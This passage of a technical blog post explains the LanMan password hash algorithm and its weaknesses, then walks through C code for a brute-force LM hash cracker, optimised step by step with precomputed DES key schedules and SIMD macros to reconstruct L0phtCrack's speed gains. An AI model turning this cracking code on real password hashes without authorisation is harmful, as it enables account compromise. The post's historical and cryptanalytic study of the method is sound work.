paper by Eli Biham. July 1998 The Electronic Frontier Foundation build a DES cracker called “Deep Crack” and recover a 56-bit key in 56 hours using a device that costs \$250,000. January 1999 Deep Crack and distributed.net break a DES key in 22 hours and 15 minutes. January 1999 L0phtCrack v2.5 released. The DES routines have been highly optimized in assembler for Pentium, Pentium MMX, Pentium Pro, and Pentium II specific processors. This results in a 450% speed increase. All alphanumeric passwords can be found in under 24 hours on a Pentium II/450.

What I try to focus on in this post is how the L0pht gained a “450% speed increase” over previous versions of the software, but first, how are LanMan hashes created?

### 3. The LanMan Algorithm

1. The password is restricted to a maximum of fourteen characters. (null-padded if required)
2. The password is converted to uppercase.
3. The password is encoded in the system OEM code page.
4. The password is split into 7-byte halves and used to create two DES keys.
5. Each key is used to encrypt the string KGS!@#\$% using DES in ECB mode, resulting in two 8-byte ciphertext values. The string “KGS!@#\$% could possibly mean Key of Glen and Steve with the combination of Shift + 12345. Glen Zorn and Steve Cobb are the authors of RFC 2433 (Microsoft PPP CHAP Extensions).
6. The two ciphertext values are concatenated to create a 16-byte value, which is the LM hash.

Using the above details, the following code uses OpenSSL to generate a LanMan hash. The only thing missing is the OEM encoding. For that reason, hashes generated by this code will not always match those generated by Windows itself. Internally, Windows originally used the CharToOem API before creating a DES key. This is important to remember because some passwords generated by Windows will simply not be recovered unless the cracker uses CharToOem or CharToOemBuff before hand.

```#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#include <openssl/des.h>

void DES_str_to_key (char str[], uint8_t key[]) {
int i;

key[0] = str[0] >> 1;
key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
key[7] = str[6] & 0x7F;

for (i = 0;i < 8;i++) {
key[i] = (key[i] << 1);
}
DES_set_odd_parity ((DES_cblock*)key);
}

char* lmhash(char *pwd) {
DES_cblock       key1, key2;
DES_key_schedule ks1, ks2;
const char       ptext[]="KGS!@#\$%";
static char      hash[64], lm_pwd[16];
uint8_t          ctext[16];
size_t           i, pwd_len = strlen(pwd);

// 1. zero-initialize local buffer
memset(lm_pwd, 0, sizeof(lm_pwd));

// 2. convert password to uppercase (restricted to 14 characters)
for(i=0; i<pwd_len && i<14; i++) {
lm_pwd[i] = toupper((int)pwd[i]);
}

// 3. create two DES keys
DES_str_to_key(&lm_pwd[0], (uint8_t*)&key1);
DES_str_to_key(&lm_pwd[7], (uint8_t*)&key2);
DES_set_key(&key1, &ks1);
DES_set_key(&key2, &ks2);

// 4. encrypt plaintext
DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)&ctext[0], &ks1, DES_ENCRYPT);

DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)&ctext[8], &ks2, DES_ENCRYPT);

// 5. convert ciphertext to string
for(i=0; i<16; i++) {
snprintf(&hash[i*2], 3, "%02X", ctext[i]);
}
return hash;
}

int main(int argc, char *argv[]) {
if (argc!=2) {
return 0;
}

printf("LM Hash: %s\n", lmhash(argv[1]));
return 0;
}
```

We identify a number of weaknesses here based on the algorithm.

1. Electronic Code Book (ECB) mode using plaintext that is always the same. Contrast this with unix crypt3() that encrypts a nonce/salt resulting in unique ciphertext. As a result of the LanMan algorithm encrypting the same plaintext, passwords seven characters or less will always include 0xAAD3B435B51404EE in the 16-byte LM hash.
2. The fourteen character password is used to create two 7-byte or 56-bit DES keys. This means a brute force attack only requires $95^{7}$ attempts instead of $95^{14}$
3. Passwords are converted to uppercase, reducing the keyspace to $69^{7}$ attempts.

### 4. Brute Force Attack

Brute force has sometimes been referred to as “dumb mode” because rather than select passwords based on a predefined set of rules, it will simply attempt all possible combinations from a set of numbers and letters, including ones that are unlikely to be used in practice. Passwords should always be easy to recall, and even today it’s unusual for people to pick something that might be difficult to remember later. Having said that, rules are imperfect and sometimes only an exhaustive search of the keyspace will succeed.

The following screenshot is of L0phtcrack 2.5 running inside a virtual machine. As you can see, it averages around 5.64 million tries/keys per second.

The brute force cracker implemented in lmcrack is simply to demonstrate the overall gains achieved via simple optimizations and isn’t intended to be used for anything else. Those that want to recover passwords should use a fully functional password cracker.

### 5. Version 1

The first version is simply using the OpenSSL library. L0phtCrack v1.0 and v1.5 both used DES routines from the OpenSSL library.

```static bool crack_lm1(void *param) {
int              i;
DES_cblock       deskey;
DES_key_schedule ks;
uint8_t          pwd[8]={0};
const char       ptext[]="KGS!@#\$%";
uint8_t          ctext[8];
crack_opt_t      *c=(crack_opt_t*)param;

for(i=0;i<7;i++) {
if(c->pwd_idx[i] == ~0UL)break;
pwd[i] = c->alphabet[c->pwd_idx[i]];
}

// while not stopped
while(!c->stopped) {
// convert password to DES odd parity key
DES_str_to_key(pwd, deskey);
// create DES subkeys
DES_set_key(&deskey, &ks);
// encrypt plaintext
DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)ctext, &ks, DES_ENCRYPT);

// increase how many passwords processed
c->complete++;

// if hashes match, set found and exit loop
if(memcmp(ctext, c->hash.b, 8)==0) {
c->found=true;
return true;
}
// decrease total tried. if none left, exit
if(--c->total_cbn == 0) {
return false;
}
for(i=0;;i++) {
// increase one. if not length of alphabet, break.
if(++c->pwd_idx[i] != c->alpha_len) {
pwd[i] = c->alphabet[c->pwd_idx[i]];
break;
}
// reset index
c->pwd_idx[i]=0;
pwd[i] = c->alphabet[0];
}
}
// we didn't find it
return false;
}
```

The screenshot below shows 2.46 million keys per second are tested. It uses no optimization at all, apart from those used by the OpenSSL library.

### 6. Precomputing Key Schedules 1

The simple design of the DES key schedule algorithm makes both differential and linear attacks easier. That is not to imply the design was simplified to facilitate attacks. It was simplified to implement on 1970s hardware with wiring. The lack of non-linear operations means that no bits in a subkey overlap with another subkey. This allows us to use a bitwise OR / bitwise XOR to combine subkeys and generate completely new ones.

We can generate key schedules for each unique bit of a 56-bit key without requiring a large amount of storage. DES_init_keys() will perform this operation and only uses 229,376 bytes of RAM. That’s 256 key schedules (0x00-0xFF) for 7 bytes.

```void DES_str_to_key (char str[], uint8_t key[]) {
int i;

key[0] = str[0] >> 1;
key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
key[7] = str[6] & 0x7F;

for (i = 0;i < 8;i++) {
key[i] = (key[i] << 1);
}
DES_set_odd_parity ((DES_cblock*)key);
}

// initialize 7*256 key schedules
void DES_init_keys(DES_key_schedule ks_tbl[7][256]) {
DES_cblock key;
int        i, j;
char       pwd[8];

memset(pwd,0,sizeof(pwd));

// for each byte of a 56-bit key
for(i=0;i<7;i++) {
// create 256 key schedules
for(j=0;j<256;j++) {
pwd[i]=j;
DES_str_to_key(pwd, (uint8_t*)&key);
DES_set_key(&key, &ks_tbl[i][j]);
}
// clear byte
pwd[i]=0;
}
}
```

DES_set_keyx() works in the same way DES_set_key() does except it uses a precomputed table. As you will see later, this approach is much faster than using the function provided by OpenSSL. We are exploiting the lack of non-linear operations in the key scheduling algorithm and the fact no bits overlap with one another. A bitwise OR is used here, but an XOR will work too.

```/ generate DES key schedule from precomputed DES schedules
void DES_set_keyx(DES_cblock*key,
DES_key_schedule *ks, DES_key_schedule ks_tbl[7][256])
{
uint64_t *s, *d;
uint8_t  *k=(uint8_t*)key;
size_t   i, j;

d = (uint64_t*)ks;

// zero initialize
for(i=0; i<128/8; i++)
d[i]=0;

// for each byte of a 56-bit key
for(i=0; i<7; i++) {
// get a key schedule
s = (uint64_t*)&ks_tbl[i][k[i]];

// perform a bitwise OR
for(j=0; j<128/8; j++)
d[j] |= s[j];
}
}
```

### 7. Version 2

This is similar to version 1 with the obvious difference of using precomputed DES schedules.

```static bool crack_lm2(void *param) {
int              i;
DES_key_schedule ks;
uint8_t          pwd[7+1]={0};
const char       ptext[]="KGS!@#\$%";
uint8_t          ctext[8];
DES_key_schedule ks_tbl[7][256];
crack_opt_t      *c=(crack_opt_t*)param;

// precompute key schedules
DES_init_keys(ks_tbl);

for(i=0;i<7;i++) {
if(c->pwd_idx[i] == ~0UL)break;
pwd[i] = c->alphabet[c->pwd_idx[i]];
}

// while not stopped
while(!c->stopped) {
// create DES subkeys from index values
DES_set_keyx((DES_cblock*)pwd, &ks, ks_tbl);
// encrypt plaintext
DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)ctext, &ks, DES_ENCRYPT);

// increase how many passwords processed
c->complete++;

// if hashes match, set found and exit loop
if(memcmp(ctext, c->hash.b, 8)==0) {
c->found=true;
return true;
}
// decrease total tried. if none left, exit
if(--c->total_cbn == 0) return false;
for(i=0;;i++) {
// increase one. if not length of alphabet, break.
if(++c->pwd_idx[i] != c->alpha_len) {
pwd[i] = c->alphabet[c->pwd_idx[i]];
break;
}
// reset index
c->pwd_idx[i]=0;
pwd[i] = c->alphabet[0];
}
}
// we didn't find it
return false;
}
```

4.44 million keys per second are tested which is a distinct improvement over version 1.

### 8. Using Macros For The Key Schedule Algorithm

In a brute force attack, we only require changing one byte in the password string for each iteration. However, DES_set_keyx will derive a key schedule from all 7 bytes. DES_init_keys2() is a new function that will generate DES key schedules using an alphabet and order them in a way that allows us to use macros for creating new key schedules.

```// initialize key schedules for alphabet
void DES_init_keys2(char alphabet[],
DES_key_schedule ks_tbl[7][256])
{
DES_cblock key;
char       pwd[7+1];
size_t     i, j, alpha_len=strlen(alphabet);

memset(pwd,0,sizeof(pwd));

// for each byte of a 56-bit key
for(i=0;i<7;i++) {
// create key schedules for each character of the alphabet
for(j=0;j<alpha_len;j++) {
pwd[i] = alphabet[j];
DES_str_to_key(pwd, (uint8_t*)&key);
DES_set_key(&key, &ks_tbl[i][j]);
}
// clear byte
pwd[i]=0;
}
}
```

The following macros replace DES_set_keyx and use vector instructions provded by SSE2 and AVX2 to improve performance.

```// create DES subkeys using precomputed schedules
// using AVX2 is slightly faster than SSE2, but not by much.
#if defined(AVX2)
#include <immintrin.h>

#define DES_SET_KEY(idx) { \
__m256i *s = (__m256i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
__m256i *p = (__m256i*)&ks[idx]; \
__m256i *d = (__m256i*)&ks[idx-1]; \
if (idx == 7) { \
d[0] = s[0]; d[1] = s[1]; \
d[2] = s[2]; d[3] = s[3]; \
} else { \
d[0] = _mm256_or_si256(s[0], p[0]); \
d[1] = _mm256_or_si256(s[1], p[1]); \
d[2] = _mm256_or_si256(s[2], p[2]); \
d[3] = _mm256_or_si256(s[3], p[3]); \
} \
}
#elif defined(SSE2)
#include <emmintrin.h>

#define DES_SET_KEY(idx) { \
__m128i *s = (__m128i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
__m128i *p = (__m128i*)&ks[idx]; \
__m128i *d = (__m128i*)&ks[idx-1]; \
if (idx == 7) {\
d[0] = s[0]; d[1] = s[1]; \
d[2] = s[2]; d[3] = s[3]; \
d[4] = s[4]; d[5] = s[5]; \
d[6] = s[6]; d[7] = s[7]; \
} else { \
d[0] = _mm_or_si128(s[0], p[0]); \
d[1] = _mm_or_si128(s[1], p[1]); \
d[2] = _mm_or_si128(s[2], p[2]); \
d[3] = _mm_or_si128(s[3], p[3]); \
d[4] = _mm_or_si128(s[4], p[4]); \
d[5] = _mm_or_si128(s[5], p[5]); \
d[6] = _mm_or_si128(s[6], p[6]); \
d[7] = _mm_or_si128(s[7], p[7]); \
} \
}
#else
#define DES_SET_KEY(idx) { \
uint64_t *p = (uint64_t*)&ks[idx]; \
uint64_t *s = (uint64_t*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
uint64_t *d = (uint64_t*)&ks[idx-1]; \
\
d[ 0]=s[ 0]; d[ 1]=s[ 1]; d[ 2]=s[ 2]; d[ 3]=s[ 3]; \
d[ 4]=s[ 4]; d[ 5]=s[ 5]; d[ 6]=s[ 6]; d[ 7]=s[ 7]; \
d[ 8]=s[ 8]; d[ 9]=s[ 9]; d[10]=s[10]; d[11]=s[11]; \
d[12]=s[12]; d[13]=s[13]; d[14]=s[14]; d[15]=s[15]; \
\
if(idx < 7) { \
d[ 0] |= p[ 0]; d[ 1] |= p[ 1]; \
d[ 2] |= p[ 2]; d[ 3] |= p[ 3]; \
d[ 4] |= p[ 4]; d[ 5] |= p[ 5]; \
d[ 6] |= p[ 6]; d[ 7] |= p[ 7]; \
d[ 8] |= p[ 8]; d[ 9] |= p[ 9]; \
d[10] |= p[10]; d[11] |= p[11]; \
d[12] |= p[12]; d[13] |= p[13]; \
d[14] |= p[14]; d[15] |= p[15]; \
} \
}
#endif
```

This really speeds up an attack, but we’re not entirely finished yet.

### 9. Initial and Final Permutation

So far, we’ve focused primarily on the key scheduling algorithm, but now let’s examine the encryption algorithm and try to reduce the amount of code required for this process.

Before encryption, the 64-bit plaintext is remapped using something known as Initial Permutation (IP). After 16 rounds of encryption have been applied, the inverse known as Final Permutation (FP) is applied. Believe it or not, both IP and FP were made part of the DES specification simply because of how expensive it was to build hardware back in the 1970s. The designers identified an issue with the wiring of hardware after the project was completed and had the choice between building a new hardware device or changing the specification.

It was simply cheaper to change the specification and it’s widely accepted this additional process does not affect security of the cipher in any way. It is akin to a modern block cipher such as NOEKEON or SM4 that converts the plaintext to big-endian on little-endian machines. As you can see from the code below, it requires a lot of operations. By removing the permutation for both the plaintext and ciphertext, there is a significant increase in the speed of recovery.

```#define ROTATE(a,n)(((a)>>(n))+((a)<<(32-(n))))

#define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
(b)^=(t),\
(a)^=((t)<<(n)))

#define IP(l,r) \
{ \
register uint32_t tt; \
PERM_OP(r,l,tt, 4,0x0f0f0f0fL); \
PERM_OP(l,r,tt,16,0x0000ffffL); \
PERM_OP(r,l,tt, 2,0x33333333L); \
PERM_OP(l,r,tt, 8,0x00ff00ffL); \
PERM_OP(r,l,tt, 1,0x55555555L); \
}

// perform initial permutation on ciphertext/hash
h[0] = c->hash.w[0];
h[1] = c->hash.w[1];
IP(h[0], h[1]);
h[0] = ROTATE(h[0], 29) & 0xffffffffL;
h[1] = ROTATE(h[1], 29) & 0xffffffffL;
```

The plaintext KGS!@#\$% in its hexadecimal representation is 0x4B47532140232425. Once the initial permutation has been applied, we end up with 0xAA1907472400B807 that gets loaded into L and R before applying each round of encryption.

### 10. Skipping Rounds

We can safely skip the last round of encryption by first checking the result of L with half of the LM hash we are trying to crack. If they are equal, only then do we apply the last round and check R.

```                  // permuted plaintext
r = 0x2400B807; l = 0xAA190747;

k = (uint32_t*)&ks[0];

// encrypt
DES_F(l, r,  0); DES_F(r, l,  2);
DES_F(l, r,  4); DES_F(r, l,  6);
DES_F(l, r,  8); DES_F(r, l, 10);
DES_F(l, r, 12); DES_F(r, l, 14);
DES_F(l, r, 16); DES_F(r, l, 18);
DES_F(l, r, 20); DES_F(r, l, 22);
DES_F(l, r, 24); DES_F(r, l, 26);
DES_F(l, r, 28);

c->complete++;

// do we have one half of the LM hash?
if (h[0] == l) {
// apply the last round
DES_F(r, l, 30);
// do we have the full hash?
if (h[1] == r) {
// ok, we found the key
c->found = true;
return true;
}
}
```

### 11. Version 3

Note how the key schedule buffers are aligned by 32 bytes. This is to enable using AVX2.

```static bool crack_lm3(void *param) {
uint32_t         h[2], l, r, t, u, *k;
DES_key_schedule ks_tbl[7][256] __attribute__ ((aligned(32)));
DES_key_schedule ks[7]          __attribute__ ((aligned(32)));
crack_opt_t      *c=(crack_opt_t*)param;

// precompute key schedules for alphabet
DES_init_keys2(c->alphabet, ks_tbl);

// perform initial permutation on ciphertext/hash
h[0] = c->hash.w[0];
h[1] = c->hash.w[1];
IP(h[0], h[1]);
h[0] = ROTATE(h[0], 29) & 0xffffffffL;
h[1] = ROTATE(h[1], 29) & 0xffffffffL;

// set the initial key schedules based on pwd_idx
for (int i=7; i>0; i--) {
// if not set, skip it
if (c->pwd_idx[i-1] == ~0UL) continue;
// set key schedule for this index
DES_SET_KEY(i);
}

goto compute_lm;

do {
DES_SET_KEY(7);
do {
DES_SET_KEY(6);
do {
DES_SET_KEY(5);
do {
DES_SET_KEY(4);
do {
DES_SET_KEY(3);
do {
DES_SET_KEY(2);
do {
DES_SET_KEY(1);
compute_lm:
// permuted plaintext
r = 0x2400B807; l = 0xAA190747;

k = (uint32_t*)&ks[0];

// encrypt
DES_F(l, r,  0); DES_F(r, l,  2);
DES_F(l, r,  4); DES_F(r, l,  6);
DES_F(l, r,  8); DES_F(r, l, 10);
DES_F(l, r, 12); DES_F(r, l, 14);
DES_F(l, r, 16); DES_F(r, l, 18);
DES_F(l, r, 20); DES_F(r, l, 22);
DES_F(l, r, 24); DES_F(r, l, 26);
DES_F(l, r, 28);

c->complete++;

// do we have one half of the LM hash?
if (h[0] == l) {
// apply the last round
DES_F(r, l, 30);
// do we have the full hash?
if (h[1] == r) {
// ok, we found the key
c->found = true;
return true;
}
}

if (--c->total_cbn == 0) return false;
if (c->stopped) return false;

} while (++c->pwd_idx[0] < c->alpha_len);
c->pwd_idx[0] = 0;
} while (++c->pwd_idx[1] < c->alpha_len);
c->pwd_idx[1] = 0;
} while (++c->pwd_idx[2] < c->alpha_len);
c->pwd_idx[2] = 0;
} while (++c->pwd_idx[3] < c->alpha_len);
c->pwd_idx[3] = 0;
} while (++c->pwd_idx[4] < c->alpha_len);
c->pwd_idx[4] = 0;
} while (++c->pwd_idx[5] < c->alpha_len);
c->pwd_idx[5] = 0;
} while (++c->pwd_idx[6] < c->alpha_len);
return false;
}
```

Now we’re talking! Over 3.5 million keys per second more than version 2.

### 12. Precomputing Key Schedules 2

Our final optimization in C is the precomputation of key schedules for all 2-byte passwords and storing them in memory. For the alphabet A-Z, this requires 86,528 bytes of RAM. 69 characters would require 609,408 bytes of RAM. For devices that perform better with large blocks of memory, one might consider precomputing key schedules for all 3-byte passwords depending on the circumstances. Worst case scenario for 3-byte passwords is around 42MB. I’ve not tried using this amount, but it might be worth researching.

```    // create key schedules for every two character password
for(i=0;i<c->alpha_len;i++) {
memset(pwd, 0, sizeof(pwd));
pwd[0] = c->alphabet[i];

for(j=0;j<c->alpha_len;j++) {
pwd[1] = c->alphabet[j];
DES_str_to_key((char*)pwd, (uint8_t*)&key);
DES_set_key(&key, p);
p++;
}
}
```

The F round is also changed to factor in the 2-byte key schedules. k1 points to the key schedule for bytes 3-7 while k2 points to the key schedules for every 2-byte combination.

```#define LOAD_DATA_tmp(a,b,c,d,e,f) LOAD_DATA(a,b,c,d,e,f,g)
u=R^(k1[S  ] | k2[S  ]); \
t=R^(k1[S+1] | k2[S+1]);

#define DES_F(LL,R,S) {\
t=ROTATE(t,4); \
LL^=DES_sbox[0][(u>> 2L)&0x3f]^ \
DES_sbox[2][(u>>10L)&0x3f]^ \
DES_sbox[4][(u>>18L)&0x3f]^ \
DES_sbox[6][(u>>26L)&0x3f]^ \
DES_sbox[1][(t>> 2L)&0x3f]^ \
DES_sbox[3][(t>>10L)&0x3f]^ \
DES_sbox[5][(t>>18L)&0x3f]^ \
DES_sbox[7][(t>>26L)&0x3f]; }
```

### 13. Version 4

cbn contains the length of the alphabet squared. For $[A,Z]$, that’s $26^{2}$ or 676 combinations. By keeping the code inside the CPU cache longer, this helps improve performance.

```    k1 = (uint32_t*)&ks1[2];
k2 = (uint32_t*)&ks2[0];

k2 += ((c->pwd_idx[0] * c->alpha_len) + c->pwd_idx[1]) * 32;
cbn = c->alpha_len * c->alpha_len;

goto compute_lm;

do {
DES_SET_KEY(7);
do {
DES_SET_KEY(6);
do {
DES_SET_KEY(5);
do {
DES_SET_KEY(4);
do {
DES_SET_KEY(3);
k2 = (uint32_t*)&ks2[0];
compute_lm:
for(i=0;i<cbn;i++) {
// permuted plaintext
r = 0x2400B807; l = 0xAA190747;

// encrypt
DES_F(l, r,  0);
DES_F(r, l,  2); DES_F(l, r,  4);
DES_F(r, l,  6); DES_F(l, r,  8);
DES_F(r, l, 10); DES_F(l, r, 12);
DES_F(r, l, 14); DES_F(l, r, 16);
DES_F(r, l, 18); DES_F(l, r, 20);
DES_F(r, l, 22); DES_F(l, r, 24);
DES_F(r, l, 26); DES_F(l, r, 28);

if (h[0] == l) {
DES_F(r, l, 30);
if (h[1] == r) {
// yay, we found it.
c->pwd_idx[0] = (i / c->alpha_len);
c->pwd_idx[1] = (i % c->alpha_len);
c->found = true;
return true;
}
}
k2+=32;
}
c->complete += cbn;
c->total_cbn -= cbn;
if ((int64_t)c->total_cbn<0) return false;
if (c->stopped) return false;

} while (++c->pwd_idx[2] < c->alpha_len);
c->pwd_idx[2] = 0;
} while (++c->pwd_idx[3] < c->alpha_len);
c->pwd_idx[3] = 0;
} while (++c->pwd_idx[4] < c->alpha_len);
c->pwd_idx[4] = 0;
} while (++c->pwd_idx[5] < c->alpha_len);
c->pwd_idx[5] = 0;
} while (++c->pwd_idx[6] < c->alpha_len);
return false;
```

We see a modest increase in speed for a single thread, but this will make more of a difference in multithreaded mode. This time we have 8.64 million keys per second.

### 14. Results

Here are all four routines running one after the other using multiple threads.

We achieve a 300% speed increase, but that’s significantly less than the 450% gain advertised by L0phtCrack twenty years ago. The only explanation I can think of at this point is that optimizers for compilers 22 years ago were not as good as they are today. Well written assembler routines would increase the speed further, but not by that much IMHO. What I’ve shown here may not be exactly how the L0pht did it, but i’d say it’s probably close enough.

Source code